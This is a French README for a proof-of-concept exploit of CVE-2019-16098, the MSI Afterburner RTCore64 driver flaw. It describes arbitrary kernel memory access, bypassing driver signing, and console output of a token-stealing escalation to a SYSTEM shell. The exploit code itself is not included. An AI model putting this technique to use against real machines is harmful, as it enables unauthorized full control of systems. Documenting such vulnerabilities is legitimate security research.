
Exploit PoC d'élévation de privilèges locale pour CVE-2019-16098.
Le pilote du Micro-Star MSI Afterburner 4.6.2.15658 (aussi connu sous le nom de RTCore64.sys et RTCore32.sys) permet à tout utilisateur authentifié de lire et d'écrire dans la mémoire arbitraire, les ports d'E/S et les MSR. Cela peut être exploité pour une élévation de privilèges, l'exécution de code avec des privilèges élevés et la divulgation d'informations. Ces pilotes signés peuvent également être utilisés pour contourner la politique de signature de pilotes de Microsoft afin de déployer du code malveillant.
Pour plus de mises à jour, consultez CVE-2019-16098
ATTENTION : Décalages codés en dur pour Windows 10 x64 Version 1903 !
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat
C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM
C:\Users\Barakat\source\repos\CVE-2019-16098>